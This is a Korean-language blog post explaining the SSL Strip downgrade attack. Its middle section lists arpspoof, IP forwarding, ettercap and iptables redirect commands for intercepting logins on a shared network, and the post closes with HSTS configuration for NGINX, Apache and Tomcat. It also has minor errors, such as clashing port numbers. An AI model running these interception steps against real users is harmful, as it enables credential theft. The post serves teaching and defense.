SSL Strip 취약점

개요

2009년 보안연구원 이였던 Moxie Marlinspike 가 처음으로 발표했던 공격입니다. HTTPS(HyperText Transfer Protocol over Secure Socket Layer) 라는 공개키 암호화 연결을 사용하고 있는 웹사이트를 HTTP 통신으로 다운그레이드 시켜 버리는 일종의 MITM(Man In The Middle attack) 공격 입니다.

 

이 취약점의 재미있는점은 공격을 당해도 SSL 인증서 오류와 관련하여 따로 사용자 측에 따로 표시하지 않기 때문에  SSL Strip 공격이 발생하고 있다는 단서를 찾을 수 없습니다.

 

어떻게 발생되는가

첫번째로 ARP Spoofing을 통해 ARP Table을 중독시키거나 사용자가 공격자의 무선 네트워크에 들어오도록 유인하는 것입니다.

 

사용자가 웹 서버와 세션을 확립 시 첫 번째로 TCP 통신을 하고 그 후는 TLS / SSL로 리다이렉션 됩니다. 여기서 공격자는 SSL을 벗겨 다운그레이드 시키고 오고 가는 데이터 정보를 쉽게 훔쳐볼 수 있습니다.

평소처럼 티스토리 페이지에 접속하면 상단에 보이는 자물쇠처럼 암호화 통신을 하고있기에 로그인 시 민감정보가 패킷흐름속에서 노출되지 않고 있습니다.

 

동일한 네트워크에 잠입해있는 공격자는 사용자의 로그인 정보를 획득하기 위해 ARP 중독을 시키고 강제로 평문통신인 HTTP로 통신하도록 시도할 수 있습니다.

<!-- ARP Spoofing 시도 -->
      arpspoof -i 인터페이스명 -t 타겟IP 게이트웨이IP
      arpspoof -i 인터페이스명 -t 게이트웨이IP 타겟IP

<!-- IP Forwarding(포워딩) 활성화
      fragrouter -B1
      echo 1 > /proc/sys/net/ipv4/ip forward

<!-- ettercap 실행 -->
      ettercap -i 인터페이스명 -T -q
      -T : Text 모드
      -q : quite 모드 즉 불필요한내용 출력X

<!-- 목적지 포트가 80번으로 들어오는 모든 패킷을 1000번 포트로 리다이렉트 -->
      iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
      -t nat : nat 테이블 사용
      -A PREROUTING : nat 와 연관, 처음으로 전달 받은 패킷을 처리하는 필터링 지점
      -p tcp : tcp 프로토콜 지정(80번 포트는 신뢰성)
      --destination-port 80 : 목적지 80번포트
      -j REDIRECT : jump 즉 리다이렉션
      --to-ports 1000 : SSL Strip 공격시 기본적으로 1000번 포트로 지정되어 있음

<!-- 공격수행후 대상 모니터링 -->
      tail -f sslstrip.log

* 로그파일 비우기 : cat /dev/null > sslstrip.log

공격을 당한 후 평소대로 www.tistory.com을 입력하고 접속하면 주소창의 URL 부분에 자물쇠가 풀려있는 것을 확인할 수 있다. 그 외에는 아무런 육안으로 확인할 수 있는 이벤트가 없기 때문에 쉽게 눈치챌 수 없습니다.

 

아무것도 모른 채 로그인을 시도한 사용자는 평소처럼 웹 서핑을 즐기고 있겠지만 공격자가 ARP 중독을 시킴으로써 중간에 모든 트래픽을 평문으로 확인할 수가 있게 됩니다.

 

---

취약점이 발생한 원인

SSL Strip 이 생긴 기원은 사용자들이 URL 또는 북마크 된 https:// 를 직접 입력하여 SSL 이 적용된 웹 사이트를 접속하지 않고 단순히 tistory.com과 같이 주소만 입력하여 들어간다는 것입니다.

 

올바른 대응방안은 아니지만 공공 네트워크에서는 접속 시 되도록 https 가 붙은 링크를 통해 들어가거나 입력을 하는 것이 중요합니다. SSL Strip 공격을 이미 당하고 있다 하더라고 https를 수기로 입력해 들어간 사용자의 정보는 갈취할 수 없습니다.

 

또한 http(메인)와 https(로그인, 결제, 회원가입 등)를 번갈아 쓰는 곳이 많다는 것입니다. 이러한 방법은 SSL Strip 공격에 노출될 가능성이 높습니다. 

* 현재 네이버, 구글, 다음, 페이스북 같은 글로벌 페이지의 경우 전 구간 https 를 사용중

 

대응 방안

비용과 모든 Byte의 정보를 사용자와 서버가 암호화 및 해독을 해야 하기 때문에 속도가 느려질 수밖에 없는 단점이 존재하기 때문에 서비스의 품질 쪽을 더 중요시 여기곤 합니다.

 

올바르게 보호하기 위해선 전구간 https를 사용하는 것이 좋지만 이외에도 서버측 에서 조치할 수 있는 HSTS(HTTP Stric Transport Security)를 적용하는것이 좋습니다.

 

HSTS는 해당 서비스를 이용하는 사용자가 https 로만 연결되도록 명령하는 형태입니다. 주로 대형 포털사이트의 경우 HSTS 가 적용되어있는 편이며 이를 적용하면 SSL Strip 공격을 무력화 시킬 수 있습니다.

// NGINX 설정
// includeSubDomains매개 변수는 HSTS 정책이 현재 도메인의 모든 하위 도메인에도 적용 
//  NGINX (버전 1.7.5 또는 NGINX Plus R5 이전)는 always매개 변수를 지원 하지 않음

server {
    listen 443 ssl;
    server_name www.example.com;

    add_header Strict-Transport-Security "max-age=31536000; includeSubDomains" always;
       }

// Apache 설정
// includeSubDomains 인수를 추가하면 하위 도메인에도 연결
//  63072000 초 (2 년) 

/etc/apache2/sites-enabled/

<VirtualHost *:443>
...
Header always set Strict-Transport-Security "max-age=63072000; includeSubDomains"
...
</VirtualHost>

// Apache Tomcat(8.x) 설정
// web.xml 파일을 편집, httpHeaderSecurity 필터 정의 및 <filter-mapping> 섹션의 주석 처리를
제거하고 아래와 같이 hstsMaxAgeSeconds 매개 변수를 추가

<filter>
 <filter-name>httpHeaderSecurity</filter-name>
 <filter-class>org.apache.catalina.filters.HttpHeaderSecurityFilter</filter-class>
 <init-param>
  <param-name>hstsEnabled</param-name>
  <param-value>true</param-value>
 </init-param> 
 <init-param>
  <param-name>maxAgeSeconds</param-name>
  <param-value>31536000</param-value>
 </init-param>
 <init-param>
  <param-name>includeSubDomains</param-name>
  <param-value>true</param-value>
 </init-param>
 <async-supported>true</async-supported>
</filter>

<filter-mapping>
<filter-name>httpHeaderSecurity</filter-name>
<url-pattern>/*</url-pattern>
<url-pattern>*</url-pattern>
<dispatcher>REQUEST</dispatcher>
</filter-mapping>